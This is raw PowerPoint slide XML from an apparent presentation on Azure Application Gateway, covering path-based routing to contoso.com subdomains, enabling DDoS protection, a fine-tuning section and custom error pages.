          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>https://contoso.com/shop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Inhaltsplatzhalter 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED7386AC-65FE-FAB8-3147-451323438C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0078" y="4163688"/>
            <a:ext cx="691357" cy="691357"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="99" name="Verbinder: gewinkelt 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DBFB00E-0CBA-1AED-7BE9-94DB216DA7ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="98" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429785" y="3341967"/>
            <a:ext cx="2350293" cy="1167400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9154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0" name="Verbinder: gewinkelt 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24B78730-1339-2A9D-9EBE-8798665274C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="98" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6429785" y="4509367"/>
            <a:ext cx="2350293" cy="1188153"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9154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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{110CA631-F42C-904C-F28B-A2FEE6F478AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429785" y="4507650"/>
            <a:ext cx="2350293" cy="17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02" name="Grafik 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{568526BB-830A-94B1-E576-17DD3A0B61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06485" y="3103365"/>
            <a:ext cx="477204" cy="477204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Grafik 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3FA888-B50F-EA1A-687D-00AB2AE347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06485" y="4270749"/>
            <a:ext cx="477204" cy="477204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="Grafik 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE3D5A2F-7C81-BF0E-F58D-CFB271BE1D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06485" y="5438133"/>
            <a:ext cx="477204" cy="477204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="105" name="Verbinder: gewinkelt 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A62A557-AD3D-6B67-D63E-652D081CD961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="98" idx="3"/>
            <a:endCxn id="104" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9471435" y="4509367"/>
            <a:ext cx="1035050" cy="1167368"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 996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6" name="Verbinder: gewinkelt 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2BC25DC-41C3-85E1-1A1D-37DFD8E3CD72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="98" idx="3"/>
            <a:endCxn id="102" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9471435" y="3341967"/>
            <a:ext cx="1035050" cy="1167400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 996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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B74ECA5-66C6-0EC7-91AE-99F92D4F156D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="98" idx="3"/>
            <a:endCxn id="103" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9471435" y="4509351"/>
            <a:ext cx="1035050" cy="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8" name="Textfeld 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74CD3110-CA3A-3AA5-9D54-63E978B99496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10400904" y="3500055"/>
            <a:ext cx="688367" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Textfeld 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A1A6F3-0F2F-327C-DB3F-F67530708F92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10400904" y="4680777"/>
            <a:ext cx="712053" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>app</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Textfeld 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D57A12-B0EA-C6BC-F789-9C6B420275BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10400904" y="5872519"/>
            <a:ext cx="712054" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>shop</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Textfeld 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5049C48-01F7-05A7-4343-7083B1A64DE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6333728" y="3074019"/>
            <a:ext cx="2350293" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>https://api.contoso.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Textfeld 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5AA2B5C-8165-AA1A-9420-E3FE96867C98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351754" y="4230651"/>
            <a:ext cx="2051051" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>https://app.contoso.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Textfeld 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B104C18-05BC-91C6-CBF9-642B2780BC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351754" y="5420521"/>
            <a:ext cx="2089308" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>https://shop.contoso.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Textfeld 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E69C6751-91D4-C2F9-3D28-C57D9E68E8DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3977548" y="3040046"/>
            <a:ext cx="622203" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Textfeld 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37A65D6E-3F82-D56D-EECE-A3E47FF9CCF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4002241" y="4212362"/>
            <a:ext cx="622203" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>app</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Textfeld 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92FA31B7-76E8-7D81-D262-FB7C856AC5EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4002823" y="5379746"/>
            <a:ext cx="622203" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>shop</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="617192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1E81ED-3A21-7006-F362-96E67AE0BC56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>DDoS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>protection</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17ECB933-3980-FB5A-9353-FB06F757C425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DDoS protection can be activated on the Virtual Network of the application gateway.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A1A3E07-0C8E-EB5C-F458-DE31FCDC558A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="6103584"/>
            <a:ext cx="6094476" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-waf-faq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Grafik 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCB6CC10-914C-7059-30BD-DAAB8DFAF76E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1381646" y="3023684"/>
            <a:ext cx="9369100" cy="1831779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Textfeld 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2027976B-5DAB-3EA1-C680-018177D9BEF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="5857363"/>
            <a:ext cx="5292090" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://azure.microsoft.com/en-us/pricing/details/ddos-protection</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Grafik 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0520BCE-1A71-8678-EEFC-126EF4C1C1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58606" y="880950"/>
            <a:ext cx="1094154" cy="1094154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37275186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J playing nightclub disco sounds">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{238CE3FA-6756-227F-F601-F6362061A7FC}"/>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Titel 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9603C149-E5DD-5777-A43E-9DB966042F4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059318" y="2223018"/>
            <a:ext cx="5979045" cy="922854"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="0D0D0D">
              <a:alpha val="60000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fine Tuning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Textplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9ADF9B8-80B2-81BA-43EB-A1BCE29F48B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094931" y="4813075"/>
            <a:ext cx="8519850" cy="1022953"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329250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79F440-CB24-9F2D-CDCA-059256F1B26E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>pages</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Textplatzhalter 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5749B8-8D52-2512-4428-C0418F8A037C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>403 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Unauthorized</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Textplatzhalter 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A1E53FB-E1A4-F4E2-EDA3-88E6AAA448DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>502 – Bad Gateway</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C9C103-26F6-9D1C-2D78-C609F863FEDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="6349805"/>
            <a:ext cx="4844034" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
